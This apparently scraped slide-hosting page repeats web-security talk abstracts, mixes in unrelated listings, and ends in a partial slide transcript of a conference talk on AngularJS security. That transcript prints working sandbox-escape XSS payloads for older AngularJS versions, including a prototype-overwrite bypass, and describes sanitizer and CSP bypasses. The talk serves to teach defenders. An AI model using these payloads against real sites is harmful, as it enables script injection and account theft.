ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...Mario Heiderich
ECMAScript 6, in short ES6, has been boiling in a copper pot for many years by now and step-by-step, browser vendors come forward to taste the first sips of this mystery soup. So, ES6 is no longer a theoretic language but already crawled across the doorstep and now lurks under your bed, ready for the nasty, waiting for the right moment to bite.
Now, what is this whole ES6 thing? How did it develop and who made it? And why is it now implemented in your favorite browser? And what does it mean for web-security and beyond?
This talk will answer these questions and showcase the new language from an attacker's perspective. You will see the new code constructs possible to be executed with ES6, new attack vectors and learn what you can do to tame that beast. Kafkaesque terminology such as expression interpolation, proper tail calls, computed properties, spread parameters, modules and tagged template strings will no longer be surprising you after attending this talk.
This talk shares the various techniques I found whilst building the XSS cheat sheet. It contains auto executing vectors, AngularJS CSP bypasses and dangling markup attacks.
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...Mario Heiderich
ECMAScript 6, in short ES6, has been boiling in a copper pot for many years by now and step-by-step, browser vendors come forward to taste the first sips of this mystery soup. So, ES6 is no longer a theoretic language but already crawled across the doorstep and now lurks under your bed, ready for the nasty, waiting for the right moment to bite.
Now, what is this whole ES6 thing? How did it develop and who made it? And why is it now implemented in your favorite browser? And what does it mean for web-security and beyond?
This talk will answer these questions and showcase the new language from an attacker's perspective. You will see the new code constructs possible to be executed with ES6, new attack vectors and learn what you can do to tame that beast. Kafkaesque terminology such as expression interpolation, proper tail calls, computed properties, spread parameters, modules and tagged template strings will no longer be surprising you after attending this talk.
This talk shares the various techniques I found whilst building the XSS cheat sheet. It contains auto executing vectors, AngularJS CSP bypasses and dangling markup attacks.
https://2018.zeronights.ru/en/reports/reverse-proxies-inconsistency/
Modern websites are growing more complex with different reverse proxies and balancers covering them. They are used for various purposes: request routing, caching, putting additional headers, restricting access. In other words, reverse proxies must both parse incoming requests and modify them in a particular way. However, path parsing may turn out to be quite a challenge due to mismatches in the parsing of different web servers. Moreover, request converting may imply a wide range of different consequences from a cybersecurity point of view. I have analyzed different reverse proxies with different configurations, the ways they parse requests, apply rules, and perform caching. In this talk, I will both speak about general processes and the intricacies of proxy operation and demonstrate the examples of bypassing restrictions, expanding access to a web application, and new attacks through the web cache deception and cache poisoning.
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourSoroush Dalili
Although web application firewall (WAF) solutions are very useful to prevent common or automated attacks, most of them are based on blacklist approaches and are still far from perfect. This talk illustrates a number of creative techniques to smuggle and reshape HTTP requests using the strange behaviour of web servers and features such as request encoding or HTTP pipelining. These methods can come in handy when testing a website behind a WAF and can help penetration testers and bug bounty hunters to avoid drama and pain! Knowing these techniques is also beneficial for the defence team in order to design appropriate mitigation techniques. Additionally, it shows why developers should not solely rely on WAFs as the defence mechanism.
Finally, an open source Burp Suite extension will be introduced that can be used to assess or bypass a WAF solution using some of the techniques discussed in this talk. The plan is to keep improving this extension with the help of the http.ninja project.
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015CODE BLUE
Microsoft's web browsers, Internet Explorer and Edge, have a feature called 'XSS filter' built in which protects users from XSS attacks. In order to deny XSS attacks, XSS filter looks into the request for a string resembling an XSS attack, compares it with the page and finds the appearance of it, and rewrites parts of the string if it appears in the page. This rewriting process of the string - is this done safely? The answer is no. This time, I have found a way to exploit XSS filter not to protect a web page, but to create an XSS vulnerability on a web page that is completely sane and free of XSS vulnerability. In this talk, I will describe technical details about possibilities of XSS attacks exploiting XSS filter and propose what website administrators should do to face this XSS filter nightmare.
Hacking and Defending APIs - Red and Blue make Purple.pdfMatt Tesauro
From LASCON 2022:
APIs are a foundational technology in today’s app-driven world and increasingly becoming the main target for attackers. How do you protect yourself? This talk will walk you through the techniques attackers use against APIs like broken object level authorization (BOLA) by following a typical API pen testing methodology. For each phase and attack, the tables are turned by covering how the attack looks from the defender's point of view including proactive ways to catch attacks early. You’ll understand how attackers find and exploit vulnerabilities and gain insight into why many traditional AppSec approaches fall short for APIs. The goal is to provide a complete overview of API vulnerabilities from both attack and defense perspectives so you can ramp up your testing and protection of all the new APIs in your AppSec life.
Mikhail Egorov - Hunting for bugs in Adobe Experience Manager webappshacktivity
Adobe Experience Manager (AEM) is an enterprise-grade CMS. It’s used by high-profile companies like Linkedin, Apple, Mastercard, Western Union, Cisco, General Motors, and others. AEM is built on top of the Apache Sling, Apache Felix and Apache Jackrabbit Oak projects. In the talk, the author will share unique methodology on how to approach AEM weabpps in pentests or bug bounty programs. Misconfiguration issues, as well as product vulnerabilities, will be covered in the talk, including newly discovered vulnerabilities for which Adobe PSIRT assigned CVE ids. The author will share automation tool for discovering vulnerabilities and misconfigurations discussed in the talk.
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...Mario Heiderich
The clipboard is one of the most commonly used tools across operating systems, window managers and devices. Pressing Ctrl-C and Ctrl-V has become so fundamentally important to productivity and usability that we cannot get rid of it anymore. We happily and often thoughtlessly copy things from one source and paste them into another. URLs into address-bars, lengthy commands into console windows, text segments into web editors and mail interfaces. And we never worry about security when doing so. Because what could possibly go wrong, right?
But have we ever asked ourselves what the clipboard content actually consists of? Do we really know what it contains? And are we aware of the consequences a thoughtless copy&paste interaction can have? Who else can control the contents of the clipboard? Is it really just us doing Ctrl-C or is there other forces in the realm who are able to infect what we believe to be clean, who can desecrate what we trust so blindly that we never question or observe it?
This talk is about the clipboard and the technical details behind it. How it works, what it really contains – and who can influence its complex range of contents. We will learn about a new breed of targeted attacks, including cross-application XSS from PDF, ODT, DOC and XPS that allow to steal website accounts faster than you can click, turn your excel sheet into a monster and learn about ways to smuggle creepy payload that is hidden from sight until it executes. Oh, and we’ll also see what can be done about that and what defensive measures we achieved to create so far.
General Waf detection and bypassing techniques. Main focus to demonstrate that how to take right approach to analyse the behaviour of web application firewall and then create test cases to bypass the same.
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...Frans Rosén
Regardless on how sophisticated your framework is, how many layers of firewalls and mitigation techniques that are put in place, there's a common weakness that often gets overlooked: the insecure direct object reference. The flaw exist everywhere: WordPress with username enumeration issues. Twitter where remote attackers could delete credit cards for the ad service and to OculusVR with a horizontal privilege escalation vulnerability which got disclosed recently.
This presentation by Roman Stratiienko (Software Engineer, Consultant, GlobalLogic) and Stanislav Goncharov (Senior Software Engineer, Consultant, GlobalLogic) was delivered at GlobalLogic Kharkiv Embedded TechTalk #5 on November 22, 2019.
Speakers shared their experience and results on the challenge started last year to make porting of cutting edge Android 10 to low-cost Orange Pi Plus 2E platform. They made it open source and available for every embedded s/w enthusiast based on AOSP project and Linux kernel upstream.
Event materials: https://www.globallogic.com/ua/events/kharkiv-embedded-techtalk-5/
Cryptography 101 for Java Developers - JavaZone2019Michel Schudel
So you're logging in to your favorite crypto currency exchange over https using a username and password, executing some transactions, and you're not at all surprised that, security wise, everything's hunky dory...
Ever wondered about the amount of cryptography begin used here? No? Let's dive into the key concepts of cryptography then, and see how the JDK supports this using the standard cryptography API's: JCA (Java Cryptography Architecture) and JCE (Java Cryptography Extension)! We'll be exploring message digests, encryption, and digital signatures, and see how they'are used in password checks, https, and block chain technology.
After this session, you'll have a better understanding of basic cryptography, its applications, and how to use the cryptography APIs in Java.
XSS is much more than just <script>alert(1)</script>. Thousands of unique vectors can be built and more complex payloads to evade filters and WAFs. In these slides, cool techniques to bypass them are described, from HTML to javascript. See also http://brutelogic.com.br/blog
An Abusive Relationship with AngularJS by Mario Heiderich - CODE BLUE 2015CODE BLUE
Some voices claim that "Angular is what HTML would have been if it had been designed for building web applications". While this statement may or may not be true, is certainly accounts as one of the bolder ones a JavaScript web framework can ever issue. And where boldness is glistening like a German Bratwurst sausage in the evening sun, a critical review from a grumpy old security person shouldn’t be too far away. This talk will have a stern, very stern look at AngularJS in particular and shed light on the security aspects of this ever-popular tool. Did the super-hero framework do everything right and follow its own super-heroic principles? Does AngularJS increase or rather decrease the attack surface of a web application? How does AngularJS play along with the Content Security Policy, and was it a good idea to combine this kind of security with futuristic feature creep? And what about AngularJS version 2.0? Beware that we won’t stop at glancing at the code itself, investigating security best practices, and verifying compatibility and other common things that contribute to robust security (or lack thereof). We will cross the moral border and see if the AngularJS team could notice rogue bug tickets. A pivotal question that everyone is wondering about is: Have they successfully kept evil minds like yours truly speaker here from introducing new security bugs into the code base? This talk is a reckoning with a modern JavaScript framework that promises a lot and keeps even more, not necessarily for the best for developers and users. We will conclude in deriving a general lesson learnt and hopefully agree that progress doesn't invariably mean an enhancement.
This talk introduces and discusses a novel, mostly unpublished technique to successfully attack websites that are applied with state-of-the-art XSS protection. This attack labeled Mutation-XSS (mXSS) is capable of bypassing high-end filter systems by utilizing the browser and its unknown capabilities - every single f***** one of them. We analyzed the type and number of high-profile websites and applications that are affected by this kind of attack. Several live demos during the presentation will share these impressions and help understanding, what mXSS is, why mXSS is possible and why it is of importance for defenders as well as professional attackers to understand and examine mXSS even further. The talk wraps up several years of research on this field, shows the abhorrent findings, discusses the consequences and delivers a step-by-step guide on how to protect against this kind of mayhem - with a strong focus on feasibility and scalability.
https://2018.zeronights.ru/en/reports/reverse-proxies-inconsistency/
Modern websites are growing more complex with different reverse proxies and balancers covering them. They are used for various purposes: request routing, caching, putting additional headers, restricting access. In other words, reverse proxies must both parse incoming requests and modify them in a particular way. However, path parsing may turn out to be quite a challenge due to mismatches in the parsing of different web servers. Moreover, request converting may imply a wide range of different consequences from a cybersecurity point of view. I have analyzed different reverse proxies with different configurations, the ways they parse requests, apply rules, and perform caching. In this talk, I will both speak about general processes and the intricacies of proxy operation and demonstrate the examples of bypassing restrictions, expanding access to a web application, and new attacks through the web cache deception and cache poisoning.
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourSoroush Dalili
Although web application firewall (WAF) solutions are very useful to prevent common or automated attacks, most of them are based on blacklist approaches and are still far from perfect. This talk illustrates a number of creative techniques to smuggle and reshape HTTP requests using the strange behaviour of web servers and features such as request encoding or HTTP pipelining. These methods can come in handy when testing a website behind a WAF and can help penetration testers and bug bounty hunters to avoid drama and pain! Knowing these techniques is also beneficial for the defence team in order to design appropriate mitigation techniques. Additionally, it shows why developers should not solely rely on WAFs as the defence mechanism.
Finally, an open source Burp Suite extension will be introduced that can be used to assess or bypass a WAF solution using some of the techniques discussed in this talk. The plan is to keep improving this extension with the help of the http.ninja project.
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015CODE BLUE
Microsoft's web browsers, Internet Explorer and Edge, have a feature called 'XSS filter' built in which protects users from XSS attacks. In order to deny XSS attacks, XSS filter looks into the request for a string resembling an XSS attack, compares it with the page and finds the appearance of it, and rewrites parts of the string if it appears in the page. This rewriting process of the string - is this done safely? The answer is no. This time, I have found a way to exploit XSS filter not to protect a web page, but to create an XSS vulnerability on a web page that is completely sane and free of XSS vulnerability. In this talk, I will describe technical details about possibilities of XSS attacks exploiting XSS filter and propose what website administrators should do to face this XSS filter nightmare.
Hacking and Defending APIs - Red and Blue make Purple.pdfMatt Tesauro
From LASCON 2022:
APIs are a foundational technology in today’s app-driven world and increasingly becoming the main target for attackers. How do you protect yourself? This talk will walk you through the techniques attackers use against APIs like broken object level authorization (BOLA) by following a typical API pen testing methodology. For each phase and attack, the tables are turned by covering how the attack looks from the defender's point of view including proactive ways to catch attacks early. You’ll understand how attackers find and exploit vulnerabilities and gain insight into why many traditional AppSec approaches fall short for APIs. The goal is to provide a complete overview of API vulnerabilities from both attack and defense perspectives so you can ramp up your testing and protection of all the new APIs in your AppSec life.
Mikhail Egorov - Hunting for bugs in Adobe Experience Manager webappshacktivity
Adobe Experience Manager (AEM) is an enterprise-grade CMS. It’s used by high-profile companies like Linkedin, Apple, Mastercard, Western Union, Cisco, General Motors, and others. AEM is built on top of the Apache Sling, Apache Felix and Apache Jackrabbit Oak projects. In the talk, the author will share unique methodology on how to approach AEM weabpps in pentests or bug bounty programs. Misconfiguration issues, as well as product vulnerabilities, will be covered in the talk, including newly discovered vulnerabilities for which Adobe PSIRT assigned CVE ids. The author will share automation tool for discovering vulnerabilities and misconfigurations discussed in the talk.
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...Mario Heiderich
The clipboard is one of the most commonly used tools across operating systems, window managers and devices. Pressing Ctrl-C and Ctrl-V has become so fundamentally important to productivity and usability that we cannot get rid of it anymore. We happily and often thoughtlessly copy things from one source and paste them into another. URLs into address-bars, lengthy commands into console windows, text segments into web editors and mail interfaces. And we never worry about security when doing so. Because what could possibly go wrong, right?
But have we ever asked ourselves what the clipboard content actually consists of? Do we really know what it contains? And are we aware of the consequences a thoughtless copy&paste interaction can have? Who else can control the contents of the clipboard? Is it really just us doing Ctrl-C or is there other forces in the realm who are able to infect what we believe to be clean, who can desecrate what we trust so blindly that we never question or observe it?
This talk is about the clipboard and the technical details behind it. How it works, what it really contains – and who can influence its complex range of contents. We will learn about a new breed of targeted attacks, including cross-application XSS from PDF, ODT, DOC and XPS that allow to steal website accounts faster than you can click, turn your excel sheet into a monster and learn about ways to smuggle creepy payload that is hidden from sight until it executes. Oh, and we’ll also see what can be done about that and what defensive measures we achieved to create so far.
General Waf detection and bypassing techniques. Main focus to demonstrate that how to take right approach to analyse the behaviour of web application firewall and then create test cases to bypass the same.
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...Frans Rosén
Regardless on how sophisticated your framework is, how many layers of firewalls and mitigation techniques that are put in place, there's a common weakness that often gets overlooked: the insecure direct object reference. The flaw exist everywhere: WordPress with username enumeration issues. Twitter where remote attackers could delete credit cards for the ad service and to OculusVR with a horizontal privilege escalation vulnerability which got disclosed recently.
This presentation by Roman Stratiienko (Software Engineer, Consultant, GlobalLogic) and Stanislav Goncharov (Senior Software Engineer, Consultant, GlobalLogic) was delivered at GlobalLogic Kharkiv Embedded TechTalk #5 on November 22, 2019.
Speakers shared their experience and results on the challenge started last year to make porting of cutting edge Android 10 to low-cost Orange Pi Plus 2E platform. They made it open source and available for every embedded s/w enthusiast based on AOSP project and Linux kernel upstream.
Event materials: https://www.globallogic.com/ua/events/kharkiv-embedded-techtalk-5/
Cryptography 101 for Java Developers - JavaZone2019Michel Schudel
So you're logging in to your favorite crypto currency exchange over https using a username and password, executing some transactions, and you're not at all surprised that, security wise, everything's hunky dory...
Ever wondered about the amount of cryptography begin used here? No? Let's dive into the key concepts of cryptography then, and see how the JDK supports this using the standard cryptography API's: JCA (Java Cryptography Architecture) and JCE (Java Cryptography Extension)! We'll be exploring message digests, encryption, and digital signatures, and see how they'are used in password checks, https, and block chain technology.
After this session, you'll have a better understanding of basic cryptography, its applications, and how to use the cryptography APIs in Java.
XSS is much more than just <script>alert(1)</script>. Thousands of unique vectors can be built and more complex payloads to evade filters and WAFs. In these slides, cool techniques to bypass them are described, from HTML to javascript. See also http://brutelogic.com.br/blog
An Abusive Relationship with AngularJS by Mario Heiderich - CODE BLUE 2015CODE BLUE
Some voices claim that "Angular is what HTML would have been if it had been designed for building web applications". While this statement may or may not be true, is certainly accounts as one of the bolder ones a JavaScript web framework can ever issue. And where boldness is glistening like a German Bratwurst sausage in the evening sun, a critical review from a grumpy old security person shouldn’t be too far away. This talk will have a stern, very stern look at AngularJS in particular and shed light on the security aspects of this ever-popular tool. Did the super-hero framework do everything right and follow its own super-heroic principles? Does AngularJS increase or rather decrease the attack surface of a web application? How does AngularJS play along with the Content Security Policy, and was it a good idea to combine this kind of security with futuristic feature creep? And what about AngularJS version 2.0? Beware that we won’t stop at glancing at the code itself, investigating security best practices, and verifying compatibility and other common things that contribute to robust security (or lack thereof). We will cross the moral border and see if the AngularJS team could notice rogue bug tickets. A pivotal question that everyone is wondering about is: Have they successfully kept evil minds like yours truly speaker here from introducing new security bugs into the code base? This talk is a reckoning with a modern JavaScript framework that promises a lot and keeps even more, not necessarily for the best for developers and users. We will conclude in deriving a general lesson learnt and hopefully agree that progress doesn't invariably mean an enhancement.
This talk introduces and discusses a novel, mostly unpublished technique to successfully attack websites that are applied with state-of-the-art XSS protection. This attack labeled Mutation-XSS (mXSS) is capable of bypassing high-end filter systems by utilizing the browser and its unknown capabilities - every single f***** one of them. We analyzed the type and number of high-profile websites and applications that are affected by this kind of attack. Several live demos during the presentation will share these impressions and help understanding, what mXSS is, why mXSS is possible and why it is of importance for defenders as well as professional attackers to understand and examine mXSS even further. The talk wraps up several years of research on this field, shows the abhorrent findings, discusses the consequences and delivers a step-by-step guide on how to protect against this kind of mayhem - with a strong focus on feasibility and scalability.
Ionic is a great tool for building hybrid mobile apps and AngularJS is a great JavaScript framework that plays very nicely with Ionic. In this talk we'll go over the basics of getting started with AngularJS+Ionic. We'll look at some real code from each of the 2 libraries and see what all is involved in building a hybrid mobile application. We will finish our journey with a real-life Ionic app presentation powered by RESTFul services.
Target Audience: People that want to see where to start with AngularJS and how it fits into Ionic. This talk assumes no prior knowledge with either library. If you've built a PhoneGap mobile app but felt lost when adding MVC-style structure or Bootstrap-esque UI components, this is the talk for you.
Assumed Knowledge: Attendees should be comfortable with "modern JavaScript". A basic understanding of classes and objects and variable scopes will be helpful. Some basic prior exposure to PhoneGap/Cordova and a UI-framework such as Bootstrap will also be helpful.
In this presentation, N. Kishorekumar, a Drupal Consultant at Valuebound will give an overview of Node.js, a JavaScript runtime built on Chrome's V8 JavaScript engine. He will discuss here the background, theories and the relevance of Node.js.
*****************************************
Get Socialistic
Our website: http://valuebound.com/
LinkedIn: https://www.linkedin.com/company/valuebound/
Facebook: https://www.facebook.com/valuebound/
Twitter: https://twitter.com/valuebound
Ionic is a great tool for building hybrid mobile apps and AngularJS is a great JavaScript framework that plays very nicely with Ionic. In this talk we'll go over the basics of getting started with AngularJS+Ionic. We'll look at some real code from each of the 2 libraries and see what all is involved in building a hybrid mobile application. We will finish our journey with a real-life Ionic app presentation powered by RESTFul services.
Introduction to Angular JS by SolTech's Technical Architect, Carlos Muentes.
To learn more about SolTech's custom software and recruiting solution services, visit http://www.soltech.net.
This talk describes the current state of the Veil-Framework and the different tools included in it such as Veil-Evasion, Veil-Catapult, Veil-Powerview, Veil-Pillage, Veil-Ordnance
== Abstract ==
Presented at Analysis of Security APIs
Satellite workshop of IEEE CSF
July 13th 2015, Verona, Italy
http://www.dsi.unive.it/~focardi/ASA8/#program
Browsers HTML sandbox is, by default, only protected by the "Same Origin Policy". Although this simple constraint gave companies a very flexible environment to play with, and was probably one of the key features that led the Web to success as we see it now, it is quite unsatisfactory from a security perspective. In fact, this solution does not face the problem of letting third party code access the whole data in the DOM when explicitly loaded and executed by the browser. This behaviour opens the door to malicious third party code attacks that can be achieved using either Cross Site Scripting (OWASP Top Ten Security risk #1 for many years) or second order attacks, such as malvertising software. In the past, several attempts to sandbox untrusted code have been made. In this talk we will focus on successes and failures of the most interesting open source sandboxing browser techniques.
Presentation made for Google Developer Day Vietnam. It is an quick and advanced overview of AngularJS modern JavaScript MVC framework. Learn some of the main features as well as other concepts around Angular.JS like SEO, Tooling, Best Practices.
StHack 2014 - Mario "@0x6D6172696F" Heiderich - JSMVCOMFGStHack
There is a way to build common, classic web applications. You know, servers, databases, some HTML and a bit of JavaScript. Ye olde way.
Grandfather still knows. And there is a way to build hip and fancy, modern and light-weight, elastic and scalable client-side web applications. Sometimes with a server in the background, sometimes with a database ? but all the hard work is done by something new: JavaScript Model-View-Controller and templating frameworks.
Angular, Ember and CanJS, Knockout, Handlebars and Underscore? those aren't names of famous wrestlers but modern JavaScript fame-works that offer a boost in performance and productivity by taking care of many things web-app right there in the browser, where the magic happens. And more and more people jump on the bandwagon and implement those frameworks with great success. High time for a stern look from the security perspective, ain't it not?
This talk will show you how those frameworks work, how secure their core is and what kind of security issues spawn from the generous feature cornucopia they offer. Do their authors really know the DOM well enough to enrich it with dozens of abstraction layers? Or did they open a gate straight to JavaScript hell introducing a wide range of new injection bugs and coding worst-practices? Well, you'll know after this talk. You'll know?
Globant Week Cali - Entendiendo el desarrollo Front-end del mundo moderno.Globant
Todos los días sale un nuevo framework de Javascript y es difícil mantenerse al día en cada framework si no encontramos un marco en común entre ellos. ¿Cómo crear la siguiente aplicación web y qué herramienta usar de manera que no quede obsoleta antes de acabar el producto?, ¿Cómo lo hacemos en Globant?, Veremos muchas cosas como Web Components, ES6, Typescript/Flow, CSS Frameworks, Unit testing e incluso Backend con Javascript.
We continue where we left off from Part 1. This section covers 2 main topics, debugging libraries and fuzzer design. For debugging libraries we go over PyDBG and WinAppDbg, discussing basic to intermediate examples, and when you might want to use one instead of the other. After that, fuzzer design is discussed, including goals, design choices, architecture, etc. Some code samples are shown from my fuzzer, along with a github link for those who are interested.
Similar to An Abusive Relationship with AngularJS (20)
Dev and Blind - Attacking the weakest Link in IT SecurityMario Heiderich
The developer is an easy and valuable target for malicious minds. The reasons for that are numerous and hard to come by. This talk delivers examples, proof, discussion and awkward moments in a pretty special way.
Everybody hates developers – especially web developers. And why not? The cracks and crevices of their APIs and implementations are the reason that vulnerabilities in web applications are still a widespread issue – and will continue to be in the foreseeable future.
Bashing and blaming them for their wrongdoings is fun – boy, they are stupid in their mistakes! But has anyone ever dared to have an open on stage battle with an actual developer?
And who of the developers dares to face their collective nemesis – the attacker? Can there be life where matter and anti-matter collide? We will know about this soon – because this is what this talk is going to be about. Developer versus attacker – vulnerability versus defense. Be prepared for swearing, violence and people leaving the stage prematurely in tears.
Bridging the Digital Gap Brad Spiegel Macon, GA Initiative.pptxBrad Spiegel Macon GA
Brad Spiegel Macon GA’s journey exemplifies the profound impact that one individual can have on their community. Through his unwavering dedication to digital inclusion, he’s not only bridging the gap in Macon but also setting an example for others to follow.
2.Cellular Networks_The final stage of connectivity is achieved by segmenting...JeyaPerumal1
A cellular network, frequently referred to as a mobile network, is a type of communication system that enables wireless communication between mobile devices. The final stage of connectivity is achieved by segmenting the comprehensive service area into several compact zones, each called a cell.
Italy Agriculture Equipment Market Outlook to 2027harveenkaur52
Agriculture and Animal Care
Ken Research has an expertise in Agriculture and Animal Care sector and offer vast collection of information related to all major aspects such as Agriculture equipment, Crop Protection, Seed, Agriculture Chemical, Fertilizers, Protected Cultivators, Palm Oil, Hybrid Seed, Animal Feed additives and many more.
Our continuous study and findings in agriculture sector provide better insights to companies dealing with related product and services, government and agriculture associations, researchers and students to well understand the present and expected scenario.
Our Animal care category provides solutions on Animal Healthcare and related products and services, including, animal feed additives, vaccination
Understanding User Behavior with Google Analytics.pdfSEO Article Boost
Unlocking the full potential of Google Analytics is crucial for understanding and optimizing your website’s performance. This guide dives deep into the essential aspects of Google Analytics, from analyzing traffic sources to understanding user demographics and tracking user engagement.
Traffic Sources Analysis:
Discover where your website traffic originates. By examining the Acquisition section, you can identify whether visitors come from organic search, paid campaigns, direct visits, social media, or referral links. This knowledge helps in refining marketing strategies and optimizing resource allocation.
User Demographics Insights:
Gain a comprehensive view of your audience by exploring demographic data in the Audience section. Understand age, gender, and interests to tailor your marketing strategies effectively. Leverage this information to create personalized content and improve user engagement and conversion rates.
Tracking User Engagement:
Learn how to measure user interaction with your site through key metrics like bounce rate, average session duration, and pages per session. Enhance user experience by analyzing engagement metrics and implementing strategies to keep visitors engaged.
Conversion Rate Optimization:
Understand the importance of conversion rates and how to track them using Google Analytics. Set up Goals, analyze conversion funnels, segment your audience, and employ A/B testing to optimize your website for higher conversions. Utilize ecommerce tracking and multi-channel funnels for a detailed view of your sales performance and marketing channel contributions.
Custom Reports and Dashboards:
Create custom reports and dashboards to visualize and interpret data relevant to your business goals. Use advanced filters, segments, and visualization options to gain deeper insights. Incorporate custom dimensions and metrics for tailored data analysis. Integrate external data sources to enrich your analytics and make well-informed decisions.
This guide is designed to help you harness the power of Google Analytics for making data-driven decisions that enhance website performance and achieve your digital marketing objectives. Whether you are looking to improve SEO, refine your social media strategy, or boost conversion rates, understanding and utilizing Google Analytics is essential for your success.
1.Wireless Communication System_Wireless communication is a broad term that i...JeyaPerumal1
Wireless communication involves the transmission of information over a distance without the help of wires, cables or any other forms of electrical conductors.
Wireless communication is a broad term that incorporates all procedures and forms of connecting and communicating between two or more devices using a wireless signal through wireless communication technologies and devices.
Features of Wireless Communication
The evolution of wireless technology has brought many advancements with its effective features.
The transmitted distance can be anywhere between a few meters (for example, a television's remote control) and thousands of kilometers (for example, radio communication).
Wireless communication can be used for cellular telephony, wireless access to the internet, wireless home networking, and so on.
APNIC Foundation, presented by Ellisha Heppner at the PNG DNS Forum 2024APNIC
Ellisha Heppner, Grant Management Lead, presented an update on APNIC Foundation to the PNG DNS Forum held from 6 to 10 May, 2024 in Port Moresby, Papua New Guinea.
1. An Abusive Relationship
with AngularJS
About the Security Adventures with the "Super-Hero"
Framework
A talk by Mario Heiderich
mario@cure53.de || @0x6D6172696F
2. Godzilla in your DOM
● Dr.-Ing. Mario Heiderich
● Researcher and Post-Doc, Ruhr-Uni Bochum
● PhD Thesis about Client Side Security and Defense
● Founder of Cure53
● Pentest- & Security-Firm located in Berlin
● Security, Consulting, Workshops, Trainings
● Simply the Best Company in the World
● Published Author and Speaker
● Specialized on HTML5, DOM and SVG Security
● JavaScript, XSS and Client Side Attacks
● HTML5 Security Cheatsheet
● And DOMPurify!
● @0x6D6172696F
● mario@cure53.de
5. What is AngularJS?
● Popular JavaScript MVC
● Model-View-Whatever actually
● Self-proclaimed “Superheroic Framework”
● Maintained and recommended by Google
● Polarizing Philosophy
● Ever-growing user-base
● Large rate of adoption
● Heavy traffic on GitHub repository
6. Why AngularJS
● It's not the first time I've been talking about
AngularJS and its shenanigans.
● We've been whaling on AngularJS for quite
some time actually.
● Here for example.
● Leading to a strange discussion.
● Is it personal? No. The reasons are different.
7.
8. Relationship Reasons
● It's exposing a large amount of ...self-love.
● Superheroic framework.
● It's changing ways websites work.
● It breaks the API often and makes upgrades
harder.
● It assumes to be smarter than HTML and works
with “markup sugar”.
● It will break everything in upcoming version 2.0.
● We saw yesterday how that will look like.
11. Maybe Not
● AngularJS has fairly high security standards.
● The security level is great if the rules are being
followed.
● By developers and maintainers. Both.
● And anything complex running in the browser
must know the browser.
● The web security paradox of layers.
● Network, Server, Browser, Framework, User, …
and all the ways back to the network.
12. It's better to design your application in such a way that users
cannot change client-side templates. For instance:
Do not mix client and server templates
Do not use user input to generate templates dynamically
Do not run user input through $scope.$eval
Consider using CSP (but don't rely only on CSP)
https://docs.angularjs.org/guide/security
16. A1: The AngularJS Sandbox
● The AngularJS Sandbox is a weird creature with strange
motivations.
● According to the documents, it's not a security tool.
● It is mostly meant to “get devs off that DOM”.
● Mean, to limit exposure of the original DOM to avoid its
pitfalls.
● The AngularJS sandbox is in place for expressions and
several directives.
● User input reflected in an expression often means
immediate XSS. The sandbox prevents that.
17. A1: First Bypasses
● Bypassing the sandbox in early AngularJS versions
was trivial.
● {{constructor.constructor('alert(1)')()}}
● That's it. Access the scope object's constructor, next
access constructor again, get Function, done.
● Function('code here')(); // like an eval
● This attack works starting with version AngularJS
1.0 and stops working in 1.2.0.
● Sadly, many sites still employ AngularJS 1.1.x.
● And have difficulties upgrading due to API changes.
Or simply don't care about upgrades.
19. A1: First Fixes
● AngularJS reacted to this and implemented fixes.
Because “no security tool”, right?
● This was done by restricting access to Function (and
other dangerous objects)
● So, we needed to get Function from somewhere
else.
● Somewhere, where AngularJS doesn't notice we
have access to it.
● ES5, Callbacks and __proto__ help here!
20. A1: More Bypasses
● AngularJS' parser was actually quite smart.
● Bypasses needed to be more creative.
● Finders are Jann Horn, Mathias Karlsson and
Gábor Molnár
● And luckily, we had Object to provide
methods to get Function from.
● Or mentioned callbacks.
● Let's dissect those for a brief moment.
25. <!-- Bypass via attributes, no user interaction →
<!-- Open that page with #foo in the URL -->
<!doctype html>
<html>
<head>
<script
src="//ajax.googleapis.com/ajax/libs/angularjs/1.3.1/angular.js"
>
</script>
</head>
<body>
<a id="foo" ng-app ng-
focus="$event.view.location.replace('javascript:document.write(docume
nt.domain)')" contenteditable="true"></a>
</body>
</html>
28. A1: Current State
● What about versions 1.3.2 to latest?
● Any publicly known sandbox bypasses?
● Access to pretty much everything has been
restricted.
● No window, no Function, no Object, no call() or
apply(), no document, no DOM nodes
● And all other interesting things the parser cannot
understand. RegExp, “new”, anonymous functions.
● Is that the end of the road?
● Let's have a look!
29. <!-- Jann Horn's latest Bypass -->
<html>
<head>
<script
src="//ajax.googleapis.com/ajax/libs/angularjs/1.4.5/angular.js"
></script>
</head>
<body ng-app>
{{
'this is how you write a number properly. also, numbers are basically
arrays.';
0[['__proto__']].toString = [][['__proto__']].pop;
0[['__proto__']][0] = 'alert("TROLOLOLn"+document.location)';
0[['__proto__']].length = 1;
'did you know that angularjs eval parses, then re-stringifies
numbers? :)';
$root.$eval("x=0", $root);
}}
</body>
</html>
37. A2: The Sanitizer
● AngularJS has an integrated HTML sanitizer.
● It's a component called $sanitize.
● It's purpose is to wash away XSS attacks
from a string of HTML.
● And return a clean string of HTML ready for
safe and secure usage.
● There is two major versions, one horrible
version, one that's not so bad.
38. A2: The Old Sanitizer
● The Old Sanitizer uses an actual HTML parser from
2008.
● That old thing from John E. Resig.
● It's extremely strict, hard to configure, crashes
literally all the time.
● We published a test-case where you can play with it.
● And it can be bypassed if some likely
prerequisites are met.
● Because of Chrome.
● Also, a friendly hat-tip to Gareth Heyes!
40. A2: The New Sanitizer
● The New Sanitizer is still ugly. But it uses the DOM
instead of a parser.
● Namely, document.implementation, just like
DOMPurify
● It is still very strict, even more so since now it
forbids SVG by default. Boo.
● Early versions did not and were “bypassable”.
● And SVG is admittedly tricky to handle.
● New versions do and are still “bypassable”.
● Because of Chrome. Again.
● Cheers, Roman Shafigullin.
44. A3: Attacking the CSP Mode
● Contrary to many other frameworks, AngularJS works
well together with CSP.
● CSP? Content Security Policy.
● The wannabe “XSS Killer”.
● And it has to, otherwise it wouldn't be deployable in
